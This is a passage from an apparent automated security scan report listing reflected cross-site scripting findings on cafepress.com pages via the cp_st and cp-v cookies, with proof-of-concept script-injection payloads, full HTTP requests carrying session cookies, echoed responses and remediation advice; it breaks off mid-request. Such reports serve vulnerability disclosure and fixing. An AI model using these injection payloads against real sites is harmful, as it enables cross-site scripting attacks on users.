The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f40</script><script>alert(1)</script>dbb7f115d79 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/sell/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=41f40</script><script>alert(1)</script>dbb7f115d79 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 51674 Date: Sun, 26 Dec 2010 13:46:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51674 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... s.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/info/sell/index.aspx' window.cafepress.tealeaf.searchTerm = '41f40</script><script>alert(1)</script>dbb7f115d79 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/sitemap/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8570a"-alert(1)-"90117c7ff9b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 147634 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 147634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/sitemap/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1af17</script><script>alert(1)</script>e3cc51a30ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=1af17</script><script>alert(1)</script>e3cc51a30ee ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 149634 Date: Sun, 26 Dec 2010 13:46:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 149634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... ess.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/sitemap/index.aspx' window.cafepress.tealeaf.searchTerm = '1af17</script><script>alert(1)</script>e3cc51a30ee ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/viewcart.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e199a"-alert(1)-"33c6f5a13e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 51172 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:51 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51172 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/viewcart.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197e0</script><script>alert(1)</script>ccc939a9ef5 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=197e0</script><script>alert(1)</script>ccc939a9ef5 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 51195
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
afepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/viewcart.aspx'
window.cafepress.tealeaf.searchTerm = '197e0</script><script>alert(1)</script>ccc939a9ef5 '
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/birth-announcements
Issue detail
The value of the cp-v cookie is copied into a JavaScript string encapsulated in double quotation marks: the Omniture variable assignment s.eVar30 = "...:<cp-v value> " in the inline script shown in the response below. The payload c1c6c"-alert(1)-"3104c288fc9 was submitted appended to the baseline cp-v value and was echoed unmodified, so the double quote ends the string literal and -alert(1)- is evaluated as JavaScript. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp-v cookie in the victim's browser. Note that the application's own cookies are scoped with domain=cafepress.com (see the Set-Cookie headers in the response), so a cookie set by a page on any host under cafepress.com would be sent to www.cafepress.com and reach this sink; absent such a foothold, this limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the legitimate cp-v value is a 32-character hexadecimal token (D0026F27AADDAF9A26C54608326FC1BA in the baseline request), so the server should discard any cp-v value that does not match that format before it reaches the page, and should additionally JavaScript-escape the value (\uXXXX encoding of every character outside [A-Za-z0-9]) at the point where it is written into s.eVar30.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; 